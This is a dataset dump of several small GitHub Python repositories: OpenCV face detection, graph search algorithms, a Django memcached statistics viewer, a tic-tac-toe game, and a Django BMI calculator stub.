\" ^ \" + str(n2) + \" is \" + str(exponent(n1,n2)) + \".\")\n else:\n print(\"Good bye!\")\n" } ]
3
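The advanced-calculator README above says to call `exponent(num1, num2)` to receive `num1^num2`; a short usage sketch of the three module-level functions, importing the module the same way `tests.py` does:

```python
import calculator

# multiply() is implemented as repeated addition, so num2 should be a non-negative int
print(calculator.multiply(7, 8))   # 56
print(calculator.divide(2, 2))     # 1.0 (always returns a float)
print(calculator.exponent(2, 10))  # 1024
```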
birds0416/Face_Detect
https://github.com/birds0416/Face_Detect
dd0323077cd819cd22b1e3fd88e4c1f9917c53bd
035d598c88ed9a87547e99cc166c9910f2534468
5b8419dd106df9974c43a3159ee8d51e7b0829ee
refs/heads/main
2023-03-05T22:33:18.516798
2021-02-16T07:29:04
2021-02-16T07:29:04
339,316,398
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5443925261497498, "alphanum_fraction": 0.5593457818031311, "avg_line_length": 28.98550796508789, "blob_id": "ccf5fc24d9073024e3bcc18a6049ab01d6c9299b", "content_id": "4994dbc4983b63459dd650d3a13bafbf09cc0514", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2186, "license_type": "no_license", "max_line_length": 80, "num_lines": 69, "path": "/face_detect.py", "repo_name": "birds0416/Face_Detect", "src_encoding": "UTF-8", "text": "import matplotlib.pyplot as plt\r\nimport cv2\r\nimport os\r\nimport glob\r\n\r\ndef face_detector(path, folderName, unorganized):\r\n\r\n try:\r\n os.mkdir(folderName)\r\n except OSError:\r\n print(\"Creation of the directory %s failed\" % folderName)\r\n else:\r\n print(\"Successfully created the directory %s \" % folderName)\r\n\r\n try:\r\n os.mkdir(unorganized)\r\n except OSError:\r\n print(\"Creation of the directory %s failed\" % unorganized)\r\n else:\r\n print(\"Successfully created the directory %s \" % unorganized)\r\n\r\n cascade_file = \"cascade/haarcascade_frontalface_alt.xml\"\r\n cascade = cv2.CascadeClassifier(cascade_file)\r\n\r\n files = glob.glob(path)\r\n imgsraw = []\r\n for i in files:\r\n a = i.split(\"/\")\r\n b = a[len(a) - 1].split(\"\\\\\")\r\n imgsraw.append(b[1])\r\n imgs = []\r\n for i in imgsraw:\r\n i = \"photos/\" + i\r\n imgs.append(i)\r\n\r\n for i in range(0, len(imgs)):\r\n img = cv2.imread(imgs[i])\r\n temp = cv2.imread(imgs[i])\r\n img_gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\n\r\n # 얼굴 인식하기\r\n face_list = cascade.detectMultiScale(img_gray, minSize=(150, 150))\r\n # 결과 확인하기\r\n if len(face_list) == 0:\r\n print(\"Failure\")\r\n name = unorganized + str(i) + \".jpg\"\r\n cv2.imwrite(name, img)\r\n # 인식한 부분 표시하기\r\n else:\r\n for (x, y, w, h) in face_list:\r\n yellow = (0, 255, 255)\r\n cv2.rectangle(img, (x, y), (x + w, y + h), yellow, thickness=20)\r\n print(\"Success\")\r\n\r\n name = folderName + str(i) + \".jpg\"\r\n cv2.imwrite(name, temp)\r\n plt.imshow(cv2.cvtColor(temp, cv2.COLOR_BGR2RGB))\r\n plt.show()\r\n\r\n# path = input(\"Path: \")\r\n# path += \"/*.jpg\"\r\n# folderName = input(\"Folder name: \")wwwwwwwww\r\n# unorganized = folderName + unorganized + \"/\"\r\n\r\npath = \"C:/Users/birds/Google Drive/코딩/machine_learning/photos/*.jpg\"\r\nfolderName = \"C:/Users/birds/Desktop/new_photos/\"\r\nunorganized = \"C:/Users/birds/Desktop/new_photos/not_human/\"\r\n\r\nface_detector(path, folderName, unorganized)\r\n\r\n" }, { "alpha_fraction": 0.50070720911026, "alphanum_fraction": 0.5388967394828796, "avg_line_length": 29.377777099609375, "blob_id": "885343fb59c8a129876bc4f6f722fcca4b364226", "content_id": "85ad1f96bcdc67fe9568e5f3e32ccfe105c28383", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1452, "license_type": "no_license", "max_line_length": 88, "num_lines": 45, "path": "/nomask.py", "repo_name": "birds0416/Face_Detect", "src_encoding": "UTF-8", "text": "# 코와 입 감지 했을때 -> 마스크 안 쓴 사진으로 분류\r\n\r\nimport matplotlib.pyplot as plt\r\nimport cv2 as cv\r\nimport numpy as np\r\n\r\nfont = cv.FONT_HERSHEY_SIMPLEX\r\ndef face_detector():\r\n\r\n face_cascade_file = \"cascade/haarcascade_frontalface_alt.xml\"\r\n # mouth_cascade_file = \"cascade/haarcascade_eye.xml\"\r\n face_cascade = cv.CascadeClassifier(face_cascade_file)\r\n # mouth_cascade = cv.CascadeClassifier(mouth_cascade_file)\r\n\r\n cap = cv.VideoCapture(0)\r\n while True:\r\n ret, cam = cap.read()\r\n\r\n if 
ret:\r\n cv.imshow('camera', cam)\r\n\r\n # press esc to close window\r\n if cv.waitKey(1) & 0xFF == 27:\r\n break\r\n\r\n gray = cv.cvtColor(cam, cv.COLOR_BGR2GRAY)\r\n faces = face_cascade.detectMultiScale(gray, 1.5, 3, minSize=(150, 150))\r\n # mouth = mouth_cascade.detectMultiScale(gray, minSize=(50, 50))\r\n\r\n for (x, y, w, h) in faces:\r\n cv.rectangle(cam, (x, y), (x + w, y + h), (0, 0, 255), 2)\r\n cv.putText(cam, \"Detected Face\", (x - 5, y - 5), font, 0.5, (0, 0, 255), 2)\r\n\r\n # for (x, y, w, h) in mouth:\r\n # cv.rectangle(cam, (x, y), (x + w, y + h), (0, 0, 255), 2)\r\n # cv.putText(cam, \"Detected Eye\", (x - 5, y - 5), font, 0.5, (0, 0, 255), 2)\r\n\r\n cv.imshow(\"cam\", cam)\r\n k = cv.waitKey(30)\r\n\r\n # cap.release()\r\n cv.destroyAllWindows()\r\n\r\ndef nomask():\r\n return\r\n\r\n" }, { "alpha_fraction": 0.5328565239906311, "alphanum_fraction": 0.5583370327949524, "avg_line_length": 29.814285278320312, "blob_id": "53fc3a2880d1cb5edd2fedac2f5b106da2a67960", "content_id": "d68f6e12b72c20351f46aa5ff827f09919512b1b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2237, "license_type": "no_license", "max_line_length": 85, "num_lines": 70, "path": "/face_detector.py", "repo_name": "birds0416/Face_Detect", "src_encoding": "UTF-8", "text": "import numpy as np\r\nimport cv2 as cv\r\nimport matplotlib.pyplot as plt\r\nimport os\r\nimport sys\r\n\r\ndef resource_path(relative_path):\r\n try:\r\n base_path = sys._MEIPASS\r\n except Exception:\r\n base_path = os.path.abspath(\".\")\r\n\r\n return os.path.join(base_path, relative_path)\r\n\r\nfont = cv.FONT_HERSHEY_SIMPLEX\r\n\r\nface_cascade_file = \"cascade/haarcascade_frontalface_alt.xml\"\r\n# face_cascade_file = \"cascade/haarcascade_frontalface_alt.xml\"\r\n# eye_cascade_file = \"cascade/haarcascade_eye.xml\"\r\nface_cascade = cv.CascadeClassifier(face_cascade_file)\r\n# eye_cascade = cv.CascadeClassifier(eye_cascade_file)\r\n# black_mask = cv.imread(file=resource_path(\"photos/black.png\"))\r\n# h_mask, w_mask = black_mask.shape[:2]\r\n\r\ncap = cv.VideoCapture(0)\r\nwhile True:\r\n ret, cam = cap.read()\r\n\r\n if ret:\r\n # cv.imshow('camera', cam)\r\n\r\n # press esc to close window\r\n if cv.waitKey(1) & 0xFF == 27:\r\n break\r\n\r\n gray = cv.cvtColor(cam, cv.COLOR_BGR2GRAY)\r\n faces = face_cascade.detectMultiScale(gray, 1.5, 3, minSize=(150, 150))\r\n # mouth = mouth_cascade.detectMultiScale(gray, minSize=(50, 50))\r\n\r\n # if len(faces) == 0:\r\n # break\r\n\r\n for (x, y, w, h) in faces:\r\n cv.rectangle(cam, (x, y), (x + w, y + h), (0, 0, 255), 2)\r\n cv.putText(cam, \"Detected Face\", (x - 5, y - 5), font, 0.5, (0, 0, 255), 2)\r\n\r\n # if h > 0 and w > 0:\r\n # x = int(x - w * 0.1)\r\n # y = int(y - h * 0.05)\r\n # w = int(1.2 * w)\r\n # h = int(1.2 * h)\r\n #\r\n # cam_roi = cam[y:y + h, x:x + w]\r\n #\r\n # mask_small = cv.resize(black_mask, (w, h), interpolation=cv.INTER_AREA)\r\n # gray_mask = cv.cvtColor(mask_small, cv.COLOR_BGR2GRAY)\r\n # ret, mask = cv.threshold(gray_mask, 240, 255, cv.THRESH_BINARY_INV)\r\n #\r\n # mask_inv = cv.bitwise_not(mask)\r\n # masked_face = cv.bitwise_and(mask_small, mask_small, mask=mask)\r\n # masked_frame = cv.bitwise_and(cam_roi, cam, mask=mask_inv)\r\n #\r\n # cam[y:y + h, x:x + w] = cv.add(masked_face, masked_frame)\r\n\r\n\r\n cv.imshow(\"cam\", cam)\r\n k = cv.waitKey(1)\r\n\r\ncap.release()\r\ncv.destroyAllWindows()\r\n\r\n\r\n\r\n\r\n\r\n" } ]
3
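Both webcam scripts in the Face_Detect record above leave `cap.release()` commented out or unreachable behind an infinite loop. A sketch of the same capture loop with guaranteed cleanup (same OpenCV calls as the files above, no other behavior implied):

```python
import cv2 as cv

cap = cv.VideoCapture(0)
try:
    while True:
        ret, frame = cap.read()
        if not ret:
            break  # camera read failed; stop instead of processing a stale frame
        cv.imshow('cam', frame)
        if cv.waitKey(1) & 0xFF == 27:  # esc key
            break
finally:
    cap.release()           # always free the camera device
    cv.destroyAllWindows()
```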
wahaaabello/search-algorithms
https://github.com/wahaaabello/search-algorithms
ec724625f4a6c5aea39767df588bc46b6c55fd70
0f21497de9b25e5b0a41ae52b98aa03f7cff3c34
9169d932951c3fac49370267554dff5872e81a4e
refs/heads/master
2020-03-29T04:16:31.979251
2018-09-21T11:19:54
2018-09-21T11:19:54
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5953229069709778, "alphanum_fraction": 0.599659264087677, "avg_line_length": 27.19650650024414, "blob_id": "dc24e41445912ce63261194f2674ba5ef3f39a97", "content_id": "23fb33ba56db147723c5a0b1da416ec97a16785b", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6457, "license_type": "permissive", "max_line_length": 96, "num_lines": 229, "path": "/main.py", "repo_name": "wahaaabello/search-algorithms", "src_encoding": "UTF-8", "text": "from collections import deque\n\n\nclass Node:\n def __init__(self, value):\n self.value = value\n self.adjacent_nodes = set()\n\n def add_adjacent_node(self, node):\n self.adjacent_nodes.add(node)\n\n @staticmethod\n def connect_nodes(node1, node2):\n node1.add_adjacent_node(node2)\n node2.add_adjacent_node(node1)\n\n\ndef depth_first_search(startNode, goal):\n visited, open_list = set(), [startNode]\n while len(open_list) > 0:\n current_node = open_list.pop()\n if current_node.value == goal:\n return current_node\n open_list.extend(current_node.adjacent_nodes - visited)\n visited.add(current_node)\n return False\n\n\ndef depth_limited_search(startNode, goal, max_depth):\n visited, open_list = set(), [(startNode, 0)]\n while len(open_list) > 0:\n current_node, depth = open_list.pop()\n if current_node.value == goal:\n return current_node\n if depth + 1 <= max_depth:\n open_list.extend([(node, depth + 1)\n for node in current_node.adjacent_nodes - visited])\n visited.add(current_node)\n return False\n\n\ndef iterative_deepening_search(startNode, goal, max_depth):\n for i in range(max_depth + 1):\n output = depth_limited_search(startNode, goal, i)\n if output:\n return output\n\n\ndef breadth_first_search(startNode, goal):\n visited, open_list = set(), deque([startNode])\n while len(open_list) > 0:\n current_node = open_list.popleft()\n if current_node.value == goal:\n return current_node\n open_list.extend(current_node.adjacent_nodes - visited)\n visited.add(current_node)\n return False\n\n\ndef bidirectional_search(startNode, goalNode):\n visited_for_root_search = set()\n visited_for_goal_search = set()\n open_list_for_root_search = deque([(startNode, [startNode])])\n open_list_for_goal_search = deque([(goalNode, [goalNode])])\n\n while len(open_list_for_root_search) > 0 and len(open_list_for_goal_search) > 0:\n print\n\n current_node_for_root_search, path_for_root_search = open_list_for_root_search.popleft()\n current_node_for_goal_search, path_for_goal_search = open_list_for_goal_search.popleft()\n\n node_children_for_root_search = current_node_for_root_search.adjacent_nodes - \\\n visited_for_root_search\n open_list_for_root_search.extend(\n [(child, path_for_root_search+[child]) for child in node_children_for_root_search])\n visited_for_root_search.add(current_node_for_root_search)\n\n node_children_for_goal_search = current_node_for_goal_search.adjacent_nodes - \\\n visited_for_goal_search\n open_list_for_goal_search.extend(\n [(child, path_for_goal_search+[child]) for child in node_children_for_goal_search])\n visited_for_goal_search.add(current_node_for_goal_search)\n\n if visited_for_root_search & visited_for_goal_search:\n # return the path from root to goal\n return path_for_root_search + path_for_goal_search[-2::-1]\n return False\n\n\ndef uniform_cost_search(startNode, edge_costs, goal):\n visited, open_list = set(), [(startNode, [startNode], 0)]\n while len(open_list) > 0:\n current_node, path, cost = open_list.pop()\n if current_node.value == goal:\n return 
path, cost\n\n for node in current_node.adjacent_nodes - visited:\n node_path = path[:]\n node_path.append(node)\n node_cost = edge_costs[(current_node, node)]\n open_list.append((node, node_path, cost + node_cost))\n\n open_list.sort(key=lambda key: key[2], reverse=True)\n visited.add(current_node)\n return False\n\n\ndef best_first_search():\n pass\n\n\ndef a_star_search():\n pass\n\n\ndef hill_climbing_search():\n pass\n\n\ndef simulated_annealing():\n pass\n\n\ndef tabu_search():\n pass\n\n\ndef grapth_coloring():\n pass\n\n\ndef initial_graph():\n A = Node('A')\n B = Node('B')\n C = Node('C')\n D = Node('D')\n E = Node('E')\n F = Node('F')\n G = Node('G')\n H = Node('H')\n I = Node('I')\n J = Node('J')\n K = Node('K')\n Node.connect_nodes(A, B)\n Node.connect_nodes(A, C)\n Node.connect_nodes(B, D)\n Node.connect_nodes(B, E)\n Node.connect_nodes(C, F)\n Node.connect_nodes(C, G)\n Node.connect_nodes(D, H)\n Node.connect_nodes(D, I)\n Node.connect_nodes(E, J)\n Node.connect_nodes(E, K)\n return A\n\n\ndef initial_graph_for_bidirectional_search():\n A = Node('A')\n B = Node('B')\n C = Node('C')\n D = Node('D')\n E = Node('E')\n F = Node('F')\n G = Node('G')\n H = Node('H')\n I = Node('I')\n J = Node('J')\n K = Node('K')\n L = Node('L')\n M = Node('M')\n N = Node('N')\n Node.connect_nodes(A, B)\n Node.connect_nodes(A, C)\n Node.connect_nodes(B, D)\n Node.connect_nodes(B, E)\n Node.connect_nodes(C, F)\n Node.connect_nodes(D, G)\n Node.connect_nodes(E, H)\n Node.connect_nodes(F, H)\n Node.connect_nodes(G, I)\n Node.connect_nodes(H, J)\n Node.connect_nodes(H, K)\n Node.connect_nodes(I, L)\n Node.connect_nodes(J, L)\n Node.connect_nodes(K, M)\n Node.connect_nodes(L, N)\n Node.connect_nodes(M, N)\n return A, N\n\n\ndef initial_graph_for_uniform_cost_search():\n A = Node('A')\n B = Node('B')\n C = Node('C')\n D = Node('D')\n E = Node('E')\n\n Node.connect_nodes(A, B)\n Node.connect_nodes(A, C)\n Node.connect_nodes(A, D)\n Node.connect_nodes(B, E)\n Node.connect_nodes(C, E)\n Node.connect_nodes(D, E)\n\n edge_costs = {}\n edge_costs[(A, B)] = 5\n edge_costs[(A, C)] = 1\n edge_costs[(A, D)] = 2\n edge_costs[(B, E)] = 1\n edge_costs[(C, E)] = 7\n edge_costs[(D, E)] = 5\n return A, edge_costs\n\n\nif __name__ == '__main__':\n # root = initial_graph()\n # output = depth_first_search(root, 'G')\n # output = depth_limited_search(root, 'G', 2)\n # output = iterative_deepening_search(root, 'G', 2)\n # output = breadth_first_search(root, 'G')\n # print(output.value) if output else print(output)\n\n # root, goalNode = initial_graph_for_bidirectional_search()\n # output_path = bidirectional_search(root, goalNode)\n # print([node.value for node in output_path])\n\n # root, edge_costs = initial_graph_for_uniform_cost_search()\n # output_path, cost = uniform_cost_search(root, edge_costs, 'E')\n # print([node.value for node in output_path], cost)\n" }, { "alpha_fraction": 0.8239436745643616, "alphanum_fraction": 0.8239436745643616, "avg_line_length": 70, "blob_id": "2f3f9fcfdc985711644cf10d8fcb21908ae53ee5", "content_id": "2bbc8cfc4a365593d7a8df425884c8ec36016b21", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 142, "license_type": "permissive", "max_line_length": 121, "num_lines": 2, "path": "/README.md", "repo_name": "wahaaabello/search-algorithms", "src_encoding": "UTF-8", "text": "# search-algorithms\nImplementation of uninformed and informed search algorithms from 'ARTIFICIAL INTELLIGENCE - A Systems Approach' by M. TIM JONES\n" } ]
2
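The driver code in the search-algorithms `main.py` above is entirely commented out; a minimal sketch of exercising two of the finished searches (assuming the file is importable as a module named `main`):

```python
from main import initial_graph, breadth_first_search, depth_limited_search

root = initial_graph()

found = breadth_first_search(root, 'G')
print(found.value if found else 'not found')  # G

# 'H' sits at depth 3 in that graph, so a depth limit of 2 cannot reach it
print(depth_limited_search(root, 'H', 2))     # False
```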
edavis/django-cache-stats
https://github.com/edavis/django-cache-stats
6e776cca27256e375ee9b720be513eed83d2b4ea
2ed68847abf38f0a5d089343e1ae15ba5e36d625
16a4b5d6d4882e7db8f75c0c8438d073424357d4
refs/heads/master
2016-09-05T09:55:17.495324
2011-06-23T19:01:22
2011-06-23T19:01:22
1,938,593
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6344605684280396, "alphanum_fraction": 0.6376811861991882, "avg_line_length": 27.227272033691406, "blob_id": "4040782cc7aac81472657a9fd2b5c4e4848bb1d4", "content_id": "e19188a4dad57c5be90d222d75192689debe69e3", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 621, "license_type": "permissive", "max_line_length": 55, "num_lines": 22, "path": "/setup.py", "repo_name": "edavis/django-cache-stats", "src_encoding": "UTF-8", "text": "from setuptools import setup, find_packages\n\nsetup(\n name='django-cache-stats',\n version=\"0.1-dev\",\n description=\"Monitor your memcached servers\",\n long_description=open('README.rst').read(),\n classifiers=[\n \"Programming Language :: Python\",\n \"Framework :: Django\",\n \"Environment :: Web Environment\",\n ],\n keywords='memcached,django',\n author='Eric Davis',\n author_email='[email protected]',\n url='http://github.com/edavis/django-cache-stats/',\n license='BSD',\n packages=find_packages(),\n zip_safe=False,\n install_requires=['setuptools'],\n include_package_data=True,\n)\n" }, { "alpha_fraction": 0.5545454621315002, "alphanum_fraction": 0.557851254940033, "avg_line_length": 27.13953399658203, "blob_id": "de954c45014eb835706e693cc6615a3d8389931d", "content_id": "4bf612f5e843b4e2dc15c5b96b201098f1dbb63d", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1210, "license_type": "permissive", "max_line_length": 81, "num_lines": 43, "path": "/cache_stats/util.py", "repo_name": "edavis/django-cache-stats", "src_encoding": "UTF-8", "text": "import datetime\nfrom decimal import Decimal\nfrom django.core.cache import cache\n\ndef get_stats():\n c = cache._cache\n stats = dict(c.get_stats())\n servers = stats.keys()\n\n conversion_map = {\n \"uptime\": lambda n: datetime.timedelta(seconds=int(n)),\n \"rusage_system\": Decimal,\n \"rusage_user\": Decimal,\n \"time\": lambda n: datetime.datetime.fromtimestamp(int(n)),\n }\n\n cache_hosts = {}\n\n for server in servers:\n cache_hosts[server] = {}\n info = stats[server].copy()\n\n for k, v in info.items():\n func = conversion_map.get(k)\n\n if func is not None:\n info[k] = func(v)\n\n elif v.isdigit():\n info[k] = int(v)\n\n try:\n info[\"hit_rate\"] = 100.0 * info[\"get_hits\"] / float(info[\"cmd_get\"])\n except ZeroDivisionError:\n info[\"hit_rate\"] = info[\"get_hits\"]\n\n info[\"gets_per_second\"] = info[\"cmd_get\"] / float(info[\"uptime\"].seconds)\n info[\"sets_per_second\"] = info[\"cmd_set\"] / float(info[\"uptime\"].seconds)\n info[\"started_at\"] = datetime.datetime.now() - info[\"uptime\"]\n\n cache_hosts[server].update(info)\n\n return cache_hosts\n" }, { "alpha_fraction": 0.7719594836235046, "alphanum_fraction": 0.7719594836235046, "avg_line_length": 33.82352828979492, "blob_id": "6445bdae5a012e0b7e4f7675a2ffbcecd08e3385", "content_id": "8c88dd0bf4df749ada7c622427a88b0989739bfa", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 592, "license_type": "permissive", "max_line_length": 69, "num_lines": 17, "path": "/cache_stats/views.py", "repo_name": "edavis/django-cache-stats", "src_encoding": "UTF-8", "text": "import datetime\nfrom django.conf import settings\nfrom django.contrib.auth.decorators import user_passes_test\nfrom django.core.cache import cache\nfrom django.shortcuts import render\nfrom django.template import RequestContext\nfrom 
django.views.decorators.cache import never_cache\nfrom .util import get_stats\n\n@never_cache\ndef server_list(request):\n context = {\"stats\": get_stats()}\n return render(\n request, \"memcached/server_list.html\", context)\n\nif getattr(settings, 'DJANGO_MEMCACHED_REQUIRE_STAFF', False):\n server_list = user_passes_test(lambda u: u.is_staff)(server_list)\n" }, { "alpha_fraction": 0.5412843823432922, "alphanum_fraction": 0.5412843823432922, "avg_line_length": 20.799999237060547, "blob_id": "8e79806bf3084cd8a7453e7ad8c788ff338c4a10", "content_id": "1f265ed44bdee008b4160310b12d87bf279a0d8c", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 109, "license_type": "permissive", "max_line_length": 50, "num_lines": 5, "path": "/README.rst", "repo_name": "edavis/django-cache-stats", "src_encoding": "UTF-8", "text": "==================\ndjango-cache-stats\n==================\n\nMonitor the utilization of your memcached servers.\n" } ]
4
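This snapshot of django-cache-stats ships no URLconf; a hypothetical hookup for the `server_list` view (the route pattern and name here are illustrative, not part of the package, and the `url()` import assumes a Django version contemporary with the code):

```python
# Hypothetical project urls.py entry -- not shipped with the package itself.
from django.conf.urls import url
from cache_stats.views import server_list

urlpatterns = [
    url(r'^cache-stats/$', server_list, name='cache_stats_server_list'),
]
```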
Gauravbisht1/Games
https://github.com/Gauravbisht1/Games
de3b291092b05c497cf7688323ea32cbefd8776b
7ae58dff1e8ce23ceac96256de7e036002654a00
80cbf12eb71b8436e4ee67adc885f557c78eea5c
refs/heads/main
2023-08-16T05:30:15.694468
2021-10-02T02:57:55
2021-10-02T02:57:55
412,673,928
2
0
null
null
null
null
null
[ { "alpha_fraction": 0.4789816439151764, "alphanum_fraction": 0.5106571912765503, "avg_line_length": 35.71739196777344, "blob_id": "b21bf0507d6bce58478289ab5270de045e160781", "content_id": "cc44d9729413569cbad00d2d0053affaf48ab09f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3378, "license_type": "no_license", "max_line_length": 105, "num_lines": 92, "path": "/Tic-Tac-Toe.py", "repo_name": "Gauravbisht1/Games", "src_encoding": "UTF-8", "text": "def speak(str):\n from win32com.client import Dispatch\n\n speak = Dispatch(\"SAPI.SpVoice\")\n speak.Speak(str)\n\nmyboard={1:' ',2:' ',3:' ',4:' ',5:' ',6:' ',7:' ',8:' ',9:' '}\ndef printboard():\n\n print(f\"{str(myboard.get(1,'+'))} | {str(myboard.get(2,'+'))} | {str(myboard.get(3,'+'))}\")\n print(\"__|___|____\")\n print(f\"{str(myboard.get(4,'+'))} | {str(myboard.get(5,'+'))} | {str(myboard.get(6,'+'))}\")\n print(\"__|___|__\")\n print(f\"{str(myboard.get(7,'+'))} | {str(myboard.get(8,'+'))} | {str(myboard.get(9,'+'))}\")\n print(\"__|___|__\")\n\ndef changes(num,inputs):\n myboard[num]=inputs\n\nif __name__==\"__main__\":\n printboard()\n speak(\"Enter First player name\")\n player1=input(\"Enter First player name --> \").title()\n speak(\"Enter Second player name\")\n player2=input(\"Enter Second player name --> \").title()\n i=0\n import pyinputplus as hup\n win=True\n while i<10000:\n if i%2==0:\n speak(f\"hey {player1},enter your number\")\n print(player1,\"---->\", end=' ')\n try:\n num1 = hup.inputNum(min=1, lessThan = 10)\n if myboard[num1] == 'X' or myboard[num1] == 'O':\n speak(\"this spot is already filled, try again\")\n print(\"this spot is already filled, try again\\n\")\n continue\n except:\n continue\n else:\n changes(num1,'X')\n i = i + 1\n printboard()\n\n elif i%2!=0:\n speak(f\"hey {player2},enter your number\")\n print(player2,\"---->\",end=' ')\n try:\n num2 = hup.inputNum(min=1,lessThan=10)\n if myboard[num2] == 'X' or myboard[num2] == 'O':\n speak(\"this spot is already filled, try again\")\n print(\"this spot is already filled, try again\\n\")\n continue\n\n except:\n continue\n else:\n changes(num2,'O')\n i = i + 1\n printboard()\n\n\n\n if (myboard[1] == myboard[2] == myboard[3] =='X' or myboard[1] == myboard[2] == myboard[3] == 'O' or\n myboard[4] == myboard[5] == myboard[6]=='X' or myboard[4] == myboard[5] == myboard[6] == 'O' or\n myboard[7] == myboard[8] == myboard[9]=='X' or myboard[7] == myboard[8] == myboard[9]=='O' or\n myboard[1] == myboard[4] == myboard[7]=='X' or myboard[1] == myboard[4] == myboard[7]=='O' or\n myboard[2] == myboard[5] == myboard[8]=='X' or myboard[2] == myboard[5] == myboard[8]=='O' or\n myboard[3] == myboard[6] == myboard[9]=='X' or myboard[3] == myboard[6] == myboard[9]=='O' or\n myboard[1] == myboard[5] == myboard[9]=='X' or myboard[1] == myboard[5] == myboard[9]=='O' or\n myboard[3] == myboard[5] == myboard[7]=='X' or myboard[3] == myboard[5] == myboard[7]=='O'):\n if (i+1)%2==0:\n print(f\"{player1} won the game\")\n speak(f\"{player1} won the game\")\n else:\n print(f\"{player2} won the game\")\n speak(f\"{player2} won the game\")\n break\n\n elif (' ' not in myboard.values() and\n ' ' not in myboard.values() and\n ' ' not in myboard.values() and\n ' ' not in myboard.values() and\n ' ' not in myboard.values() and\n ' ' not in myboard.values() and\n ' ' not in myboard.values() and\n ' ' not in myboard.values() and\n ' ' not in myboard.values()):\n print(\"Match Draw\")\n speak(\"Match Draw\")\n break\n" } ]
1
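The win check in `Tic-Tac-Toe.py` above spells out every row, column, and diagonal twice (once per symbol). A behavior-equivalent, table-driven sketch of the same test:

```python
WIN_LINES = [(1, 2, 3), (4, 5, 6), (7, 8, 9),   # rows
             (1, 4, 7), (2, 5, 8), (3, 6, 9),   # columns
             (1, 5, 9), (3, 5, 7)]              # diagonals

def winner(board):
    for a, b, c in WIN_LINES:
        if board[a] == board[b] == board[c] and board[a] in ('X', 'O'):
            return board[a]  # the symbol that completed a line
    return None
```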
z4yed/BMI-Calculator-Django-Jquery
https://github.com/z4yed/BMI-Calculator-Django-Jquery
c894df527732006eaa07363617d7216a17bee94a
fb9deeca9ca8a8e2eb35f59560cded3b3e163017
6af93f444c7b3f5772a72ee28c94c5256545dc65
refs/heads/master
2023-02-02T02:09:32.248783
2020-12-18T09:20:20
2020-12-18T09:20:20
322,543,437
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6600000262260437, "alphanum_fraction": 0.6600000262260437, "avg_line_length": 17.75, "blob_id": "43d8603f85de9dd3ab938b7e874d680154b9c03c", "content_id": "67d86bdee7c9fe92c78e4a9d76558b438e57578a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 150, "license_type": "no_license", "max_line_length": 52, "num_lines": 8, "path": "/calc/urls.py", "repo_name": "z4yed/BMI-Calculator-Django-Jquery", "src_encoding": "UTF-8", "text": "from django.urls import path, include\nfrom . import views\n\napp_name = 'calc'\n\nurlpatterns = [\n path('', views.HomeView.as_view(), name='home'),\n]\n" }, { "alpha_fraction": 0.6222222447395325, "alphanum_fraction": 0.6222222447395325, "avg_line_length": 19.846153259277344, "blob_id": "1c3abf3ccf7d4a60f4c87567f9a48423fb7b8ff1", "content_id": "7578c15102fc4a88ede6a0378c8a99c96c41edcf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 270, "license_type": "no_license", "max_line_length": 57, "num_lines": 13, "path": "/calc/views.py", "repo_name": "z4yed/BMI-Calculator-Django-Jquery", "src_encoding": "UTF-8", "text": "from django.shortcuts import render\nfrom django.views import View\n\n# Create your views here.\n\n\nclass HomeView(View):\n def get(self, request):\n\n context = {\n 'message': \"hi there. \",\n }\n return render(request, 'calc/home.html', context)" }, { "alpha_fraction": 0.7516129016876221, "alphanum_fraction": 0.7548387050628662, "avg_line_length": 33.44444274902344, "blob_id": "d6343fc973e8087ccc2b171dd358b334486964f4", "content_id": "1d0f8c8e816c651c5292a5b5876e25a650849ed7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 310, "license_type": "no_license", "max_line_length": 79, "num_lines": 9, "path": "/README.md", "repo_name": "z4yed/BMI-Calculator-Django-Jquery", "src_encoding": "UTF-8", "text": "# BMI-Calculator-Django-Jquery\nThis is a simple BMI calculator. \n\n## Create a virtualenvironment & activate it. Then Run the following commands :\n\n* $ pip install django\n* $ git clone https://github.com/z4yed/BMI-Calculator-Django-Jquery.git\n* $ cd BMI-Calculator-Django-Jquery/\n* $ python manage.py runserver\n" } ]
3
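The BMI arithmetic itself is not part of this snapshot (the record only contains the URL wiring, a view, and the README), but the underlying formula is body mass in kilograms divided by the square of height in metres:

```python
def bmi(weight_kg, height_m):
    """BMI = kg / m**2; e.g. 70 kg at 1.75 m gives about 22.9."""
    return weight_kg / (height_m ** 2)

print(round(bmi(70, 1.75), 1))  # 22.9
```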
rheehot/Capstone_AWS_DeepRacer
https://github.com/rheehot/Capstone_AWS_DeepRacer
843fd3d79fcc5fff82fcf11b5abfb5ae55869b38
fac82d2c40bb48ecd984d69ba3f111b9c5c7863b
e5f54207e0f7ef67ad0fc914c09f567167aacea7
refs/heads/master
2023-01-03T13:05:49.281243
2020-11-03T17:39:33
2020-11-03T17:39:33
null
0
0
null
null
null
null
null
